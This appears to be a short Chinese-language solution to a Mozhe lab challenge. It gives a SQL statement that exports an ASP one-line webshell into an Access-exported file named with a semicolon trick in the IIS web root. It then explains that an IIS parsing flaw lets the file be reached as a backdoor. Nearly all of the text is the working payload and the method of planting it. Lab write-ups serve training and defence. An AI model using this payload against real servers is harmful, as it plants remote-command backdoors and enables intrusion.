【原题】
https://www.mozhe.cn/bug/detail/cXBuSzIya1pWbHdjVFFwNXM3c1ZtZz09bW96aGUmozhe
【解法】
用过sql查询语句写入
select '<%eval request("pass")%>' into [sum] in 'c:\inetpub\wwwroot\1.asa;x.xls' 'excel 8.0;' from [sum]
这个语句用于将一句话导出到excel(access不允许导出其他的危险格式),然后利用解析漏洞访问一句话木马。